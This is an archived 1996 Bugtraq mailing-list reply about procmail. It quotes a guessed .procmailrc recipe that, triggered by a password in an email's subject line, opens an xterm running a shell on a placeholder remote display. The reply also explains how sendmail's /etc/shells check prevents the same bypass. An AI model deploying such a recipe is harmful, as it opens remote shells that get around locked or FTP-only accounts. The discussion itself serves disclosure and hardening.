[3079] in bugtraq

home help back first fref pref prev next nref lref last post

Re: procmail

daemon@ATHENA.MIT.EDU (Kari E. Hurtta)
Wed Aug 7 16:48:12 1996

Date: 	Wed, 7 Aug 1996 08:47:26 +0300
Reply-To: Bugtraq List <BUGTRAQ@NETSPACE.ORG>
From: "Kari E. Hurtta" <Kari.Hurtta@dionysos.fmi.fi>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@NETSPACE.ORG>
In-Reply-To:  <199608062130.WAA25867@server2.mersinet.co.uk> from Neil
              Soveran-Charley at "Aug 6, 96 10:30:46 pm"

Neil Soveran-Charley kirjoittaa:
> > hi there ,
> > I just heard from a friend that there is a bug in procmail
> > which allows anyone to open an xterm window from any
> > m/c .has anyone heard of  this if so can u post the details
> > and the xploit
> > thanx
> > danny
> >
>
>    NB: This isn't a 'hack an account' hole. However if you have
> 'ftponly' accounts, i.e. people grab email via pop, but also have ftp
> access for maintaingin their web pages, with a 'shell' that prints a
> message and exits, then the following is possible to work around such
> security...
>
>    I think there may well be such an exploit. I'd guess it is simply
>  something like:
>
> (.procmailrc contents)
>
> :0 Hc
> * ^Subject:.*APassword
> /usr/bin/X11/xterm -display <some display> -e <a shell>
>
> (end .procmailrc)
>
>   Then email yourself with something with the password in the subject
> line and an xterm gets popped up on the display, running the given
> shell, thus bypassing any 'locked account' or 'ftponly' shells...
>
>   I'm sure procmail MUST have some security feature to disallow this
> sort of thing? But I could be wrong, and haven't checked the manual
> pages yet.

Sendmail disallows this short things by not allowing pipes in .forward
if user have not valid shell (listed in /etc/shells). Yes, if you
use procmail as local delivery agent, then you need same kind mechanism
in procmail also (if it allows piping mail to programs).

home help back first fref pref prev next nref lref last post